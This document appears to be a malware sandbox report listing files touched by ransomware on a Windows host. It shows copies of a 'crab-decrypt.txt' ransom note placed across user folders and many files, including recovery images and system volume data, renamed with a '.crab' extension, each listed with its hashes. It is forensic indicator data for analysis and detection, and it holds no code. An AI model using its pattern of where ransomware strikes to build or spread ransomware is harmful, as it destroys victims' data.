False
c:\users\aetadzjz\documents\4pk5xz3if\ivw0rghlicg hzx0\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\axphq0mf_fkp\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\f-ym27jzwwd_1ngvaibv\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\my shapes\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\my shapes\_private\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\onenote notebooks\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\onenote notebooks\my notebook\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\outlook files\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\tyadvae4csr\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\documents\tyadvae4csr\kpmsm5_jdwi-fzc\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\downloads\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\favorites\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\favorites\links\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\favorites\microsoft websites\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\favorites\msn websites\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\favorites\windows live\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\links\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\-hvupxg7m_cs\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\dnjaknviy7yvnjqjzio\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\dnjaknviy7yvnjqjzio\ejx7u\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\dnjaknviy7yvnjqjzio\ejx7u\jjpcubig7zkaw zl1d7\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\dnjaknviy7yvnjqjzio\qfwmg0ir4m6yey4\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\ftjivial6h\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\music\ftjivial6h\v4swspqo7bj8a\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\network shortcuts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\onedrive\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\fscxnasq_v\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\fscxnasq_v\p1pr0skdn-cy8_\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\fscxnasq_v\p1pr0skdn-cy8_\1ck-5-pyy6hdpu\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\npghzbmpi\_5dyijt\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\pictures\q59pvm4dgorh9c\ski-vcpkn\xbezwnngcfmwaoec2\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\printer shortcuts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\recent\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\saved games\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\searches\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\sendto\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\start menu\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\appdata\roaming\microsoft\windows\templates\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\3uxehkbbxw-r\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\jg-ab\sh0kyzrkmp\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\users\aetadzjz\videos\crcpleaztab\kdvacwnk9kbryta3pnb\6qnc7pf6pw8cp\u6lb6668pv_epk\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d
False
c:\recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.crab 3.02 MB MD5: 43cd44d565751c430fd8bc932963050e
SHA1: e4ccd06c35c9e92de786778c1cce15e21a6f8178
SHA256: a8c7571b9bb142ab0faeb23a8a81e7d22cfdc41a9016e026d04a96bacbba5d8a
False
c:\recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\winre.wim.crab 10.00 MB MD5: 67c280d20da4fb2a80bb3b5f1d218cb3
SHA1: 875b197dddb429d4e813fdc3afe6b6ef7bd3bc5f
SHA256: fcd65205345ff257168043015f8e925981cf47812925fafce0adb90a7b25c43b
False
c:\system volume information\spp\onlinemetadatacache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_ondisksnapshotprop.crab 2.84 KB MD5: 92f3911d39d468977528af5501ff19ed
SHA1: 46fb5a44f9b6d85b55f2efbe893074adefcb3f07
SHA256: 24c4918bbbc8a8c70e0732e44b44eff6650303605be293443fa4ea5492f97eb4
False
c:\system volume information\spp\onlinemetadatacache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_ondisksnapshotprop.crab 4.04 KB MD5: 7d667522d3066243f12f9fe19d4b1bb1
SHA1: 291ac43919ab2b8abf042f272418ae2719723dbc
SHA256: 7a702baeb32f9f8014bc4490e38d1ed4e0874455031521d5c1d265b47dae31d3
False
c:\system volume information\spp\onlinemetadatacache\{1d99f231-08df-4547-9987-3ce24f9e555d}_ondisksnapshotprop.crab 1.57 KB MD5: f85bf7b30a11b07a7c0a8ea024ba0c64
SHA1: f21455721488d807e64e0905ced21f1cfe9f3098
SHA256: fc583b29f5bb999f163fb05c9a752cf69a5fa5390b1fa4ba1326ba0e7dafc02b
False
c:\system volume information\spp\onlinemetadatacache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_ondisksnapshotprop.crab 1.45 KB MD5: 33d7fe9ea1927d5943af79a530940b9d
SHA1: 4e745e8e8757ad984669269d8b4f3c5167400084
SHA256: cc23227d514e1ff26cda56a0862a9880107f997e551375134e47d15e7f7157ef
False
c:\system volume information\spp\onlinemetadatacache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_ondisksnapshotprop.crab 2.68 KB MD5: dda871dc221199a300b0e9c4ceb2b439
SHA1: 087f753465745a46c81828327108b4158ae6f606
SHA256: 9b22fc7cd0f73c7b6a63f736612285d95b8cbbd8d762a451762bc4fb586680fa
False
c:\system volume information\spp\onlinemetadatacache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_ondisksnapshotprop.crab 4.05 KB MD5: 5c4089e5ad5156ae9f20172c4a590c6e
SHA1: acd35edf74a3a42059a787da0b1f50dffcbe6545
SHA256: e006b76db1efb33dc076b64d192e672bde2b926459eedbb24e6b4a6c0f21cbd5
False
c:\system volume information\spp\onlinemetadatacache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_ondisksnapshotprop.crab 2.35 KB MD5: 8eeb7f80ad73189f6750b5326d363a47
SHA1: 67b2b29c518d59c0b381f0ce48601fd23223a027
SHA256: 4d72d86851000d72439752475b9c52a1e32084e2abf743d19fdd951315fc7f13
False
c:\system volume information\spp\onlinemetadatacache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_ondisksnapshotprop.crab 2.68 KB MD5: 0b786fb4b8b5dffdd405b4c4be11f604
SHA1: 718e122ec90b85272ec432370a7f7c5f664848dd
SHA256: 08a686392726d07d07ac59f7ac9e053377f77df0b596ad379a93d3f99e9b8133
False
c:\system volume information\spp\onlinemetadatacache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_ondisksnapshotprop.crab 3.88 KB MD5: 821a722a0b2811d835ab63607be5647f
SHA1: a9a5eb93f971de077c7704d2c47018ac0d3ae5aa
SHA256: 5d9c72c6b35f1a5bd99aba521351002f61d5ade427f57ef865196f2b243fae10
False
c:\system volume information\spp\onlinemetadatacache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_ondisksnapshotprop.crab 2.68 KB MD5: 8aaa52089723ac8b6888073a76bc0672
SHA1: 67952bc5d8dbb2c1a2978c8578e9220d27ceebb9
SHA256: b0e2c0609ab223fa812ed49231b6c520bfcc5f62621893332d2abd7c50d02cb6
False
c:\system volume information\spp\onlinemetadatacache\{9f994170-a62e-460e-95f4-d454e609b902}_ondisksnapshotprop.crab 2.51 KB MD5: 7d62b15719960ace0e5ad2f658c89a94
SHA1: d4b41d1fea31108b6090c16407d3f9dadbe453bc
SHA256: 9dca835912a8fb2378ae42b8087a197595f17ca491c98ec603abfce3c626714a
False
c:\system volume information\spp\onlinemetadatacache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_ondisksnapshotprop.crab 3.23 KB MD5: bf916125d680277a5269465677bea27c
SHA1: 0026194f5a79f627b805fd6caf9eb7df619414f6
SHA256: bc7773e1090ca5ed968a1fc2215061fdb10dd20ba203e4c69a3bda903e723b11
False
c:\system volume information\spp\onlinemetadatacache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_ondisksnapshotprop.crab 3.15 KB MD5: d50a8c1ffa8ce7509b9dbd9fb328941a
SHA1: c5084f3d093c482c8b6d579e2303a9a4c45e8e35
SHA256: 3d3591dcae793acfb6925db03b8467b7b951f58ef3ed60b55129f638b5263667
False
c:\system volume information\spp\onlinemetadatacache\{b93ef032-f284-4373-867a-0a7c411a3533}_ondisksnapshotprop.crab 3.65 KB MD5: 9e16a8ac6124780e9d00065f416ffb01
SHA1: 8bf5e229d416a81aef057aa199e5f93b0bfa0d98
SHA256: a37e31baa926c7a8f4c49778f663a97cf2cda61acf8471b6633f267a88b9fc68
False
c:\system volume information\spp\onlinemetadatacache\{c684e574-aa8a-4967-87af-835ad01dac1f}_ondisksnapshotprop.crab 2.99 KB MD5: 9b8fd1f1be6d8465a59801e267957190
SHA1: 910258c5ea8d0e9fa71c68dd20a40cf1fdf96740
SHA256: 15a417bfa478526d380f59fab79e7951dba87e6c2d99983a38ecc039371c8862
False
c:\system volume information\spp\onlinemetadatacache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_ondisksnapshotprop.crab 3.35 KB MD5: c4c8693a3646d88003d2ba9d1a737282
SHA1: e1195929c1d75b00e2da4c32e63b1c3caf6ca3bb
SHA256: f01ca79c475affa6701f9a67d17def7397a2670ae77c6ac57e1ccfcfa6ff628c
False
c:\system volume information\spp\onlinemetadatacache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_ondisksnapshotprop.crab 3.88 KB MD5: c9a91667924aa81f5108498158c55c06
SHA1: 981ea04ac5339391db5f93824cc0f1ff85541a71
SHA256: a62561581f11e203f0ef2ecdb54a21379681151537a1a429693916252b1e4c91
False
c:\system volume information\spp\onlinemetadatacache\{f00aef54-2b29-4f30-9429-c13ae938f270}_ondisksnapshotprop.crab 2.84 KB MD5: b560059c606e12f5c32050261d14c1ff
SHA1: 5912fc6cc6ba7a6734673cda483336fd40d4351d
SHA256: 5168f654eaa2385a754b34f65e08d468e77661700a107a784398dcdd3bf2d524
False
c:\system volume information\spp\onlinemetadatacache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_ondisksnapshotprop.crab 2.68 KB MD5: da052c66e990da729a1db994787425fd
SHA1: aa1724c4bf0da0d2be02e7a22546abb592582f86
SHA256: b9f78bf8f89eb7f9d4ab218b6e6287549d92c76a75771da61303b0d3069121e4
False
c:\system volume information\spp\onlinemetadatacache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_ondisksnapshotprop.crab 1.37 KB MD5: a5eb4c535cc662a1d10f3254bb0ac041
SHA1: 4de5295eb104c407346b6be37bd95d3db3b6cd17
SHA256: 48f00be28d5a77c2dc6b939f7b99c7e3c9087cf4c4116cc94b422f0f89ff4207
False
c:\system volume information\syscache.hve.crab 256.51 KB MD5: d9b0352752e8fe3d577c5929b32794f9
SHA1: cffedb3b8bd0148fd50c9a1046dbba5b6dc97c58
SHA256: c3b96263c67d8319aca3d9dbeb8b9e420c16c8b1fc62304472435ef4e92920b9
False
c:\system volume information\syscache.hve.log1.crab 41.51 KB MD5: 59bc9e31a0428eabc39dde171d5fbd7e
SHA1: f61d231388feded7a422e853a37d587aaafb0147
SHA256: de90c4d5d534b2e82cce7e12ed3a8af9d7765508a7bf703e6ddcc908a289aba0
False
c:\system volume information\tracking.log.crab 20.51 KB MD5: 61c09867f8af19edf74b9b5e45d3b1d9
SHA1: 8502152abd6f9cbb0f92264a1f46858d26ac8c36
SHA256: 0ec11cbe929329634047e4f415436899189677e09323639dabe9d1a25012516e
False
c:\users\aetadzjz\appdata\roaming\3i-ldvlh0.ppt.crab 72.10 KB MD5: 4e611e186b1636943c1654eb0cc32122
SHA1: 8cf88d5fb3f94511251fe3ba0647221414391d49
SHA256: 1305598c574ec0e82497d5a406cbae40a54d828b9b0af632f414b78b3e0d8aa4
False
c:\users\aetadzjz\appdata\roaming\4ewporeka.mp3.crab 17.18 KB MD5: 9e7f4497818cfa685399a175227bd7cc
SHA1: 1a2c8640d0dc0878e6c7ba3354131844325eabc5
SHA256: 5b0b74cc614be61fb404f20032bcef210b7330c0ab1ab235606d0207bec0fba1
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\javascripts\glob.settings.js.crab 0.52 KB MD5: a2f1b7a00369045dbc51a56e10974ce5
SHA1: 3ce730cd831254e5730c371cf74900fafc42ff1d
SHA256: 4ce2a8c7d9867a9dca98be401e10af28a33c197f9f351b75d743618114ac2b6f
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\addressbook.acrodata.crab 5.79 KB MD5: d2573f49d84c8b7902d27d679a2f4b38
SHA1: 4123aff4631edeb48dbdda4a83064a8eafd086d6
SHA256: b794679eb3f4ad8bff9e72765cc61a9aef81a77b61c0a117d37f07891edd743e
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\48b76449f3d5fefa1133aa805e420f0fca643651.crl.crab 1.43 KB MD5: b40f87a82b26222445ecaddc6c02dc4b
SHA1: 97b571f632242ba60cabab6c193baa475d654d7f
SHA256: 88d0f80e755ec4f4bdcbf15f4ee4d893fc65cef0256547cc99c8943bd2c6029d
False
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\a9b8213768adc68af64fcc6409e8be414726687f.crl.crab 37.34 KB MD5: 543041fa9e4f820209b3561b1a81107d
SHA1: d010ecf6383ee72e3aeffb6af0d6c1e02c1f4822
SHA256: f132ef918163e88070073c1673a8510360d4b4886d6446d02c8410d989c6c250
False
c:\users\aetadzjz\appdata\roaming\cnxo4ofz-2lw.bmp.crab 82.35 KB MD5: b9f5f0c879e0782aaabcbddae0dbb8fa
SHA1: 043da47bdd302ba7090b4c87fd1a90a4e24f1ab8
SHA256: 43805751c0d7f8f35b1dcf37988aa377befb4257004f7d012515388d29df0bac
False
c:\users\aetadzjz\appdata\roaming\e xzj_-0mte61j1y7.png.crab 40.34 KB MD5: 3527f64f4d40222161e004a52f6f52d7
SHA1: 4e50834a02df9b6724011bc1a22820cd259a0752
SHA256: cb86435f05fd335d53ebf359c640b5abff13703dcd821f6783487a0772cafe75
False
c:\users\aetadzjz\appdata\roaming\ep00vf8facu03ctbnmff.odp.crab 84.91 KB MD5: e38cb85d94d03b3468ed2ed87abb959c
SHA1: 5a7e46fa913b95aae5fc136246dbb90481341a37
SHA256: 76ca7ce6f71d86c55b0dad027b708f801fed6b52016e664b444478c3d95cd234
False
c:\users\aetadzjz\appdata\roaming\esgmrbyfuxknpc.jpg.crab 35.12 KB MD5: b8f564643696fea1461240c955d25fb7
SHA1: 99991dd846f9a3b2332e893ce7102a2502384df6
SHA256: 0b94bcb236dd27888b1065015737385660ca555c3d575f404645c1ac9b311b22
False
c:\users\aetadzjz\appdata\roaming\fxtvw3asn.jpg.crab 85.05 KB MD5: 1996410adfeef9d298f817c6a5941969
SHA1: 7c192a5ae7517676a7ac6502bca2d5768352c91e
SHA256: 7a2082eb59643a90a336837503a75599a559be32082a381e2b5dff2d0ab8cf83
False
c:\users\aetadzjz\appdata\roaming\gvkrgagp6w1l2hzuog.gif.crab 81.71 KB MD5: df0e728cf2d11b59a2346d2a2ecd1556
SHA1: 71170e501ecc6f263cff596ed1802bef4e9de215
SHA256: 96c80464da76d624eeccec347889a14cf825309f281b97c7892e9d99e163426c
False
c:\users\aetadzjz\appdata\roaming\h0cbvpng ittdsph.jpg.crab 57.52 KB MD5: ab8220ad9601a9d618ba1299cd965142
SHA1: 1bd928543c12d0abb6a74abc60abd7b0bc96bd3d
SHA256: 4bdab5129200312e71d0799719ac57c3c4ea6a87117726411f44f45412de778c
False
c:\users\aetadzjz\appdata\roaming\hoow2yzez.wav.crab 100.49 KB MD5: 19eb469de685db066f54db82289ce8bf
SHA1: 406e39ffbad59555f58dc5b1894b1776b1775e5c
SHA256: d4443c235f42e869f3b0e98b4193ea2b1f74a4f7ac2f98ff915e83ebcdf8b06f
False
c:\users\aetadzjz\appdata\roaming\kdtlh1.png.crab 87.96 KB MD5: 3333bcbafb82b2d11ac6c257f7b1c714
SHA1: f7587a444fbffb3e6dba4b53d2fdd03d6f8d868e
SHA256: 195f38d62081637b9354a227958eb89d856cdd78194c7924ea6f7eda90471810
False
c:\users\aetadzjz\appdata\roaming\lzvkkvrkztf.m4a.crab 30.07 KB MD5: 1a4c07b6e1a8e2a78eb10709082ee20a
SHA1: aff698e91b1e98e5ce97e4bb9d24d69cee31fc0a
SHA256: 51792521c3545a1910639e729adc75b9725e600516025b2dac43ac8260b17e27
False
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 0.80 KB MD5: c3a2ca768b82a4208abb05e2f849f3b0
SHA1: cedc07f526ff8c8c6517264ffbd493ecefea6993
SHA256: 66ae511b4016a83b7f346a3969247965954e0cc7b2c6603ce690dee9a0f5db62
False
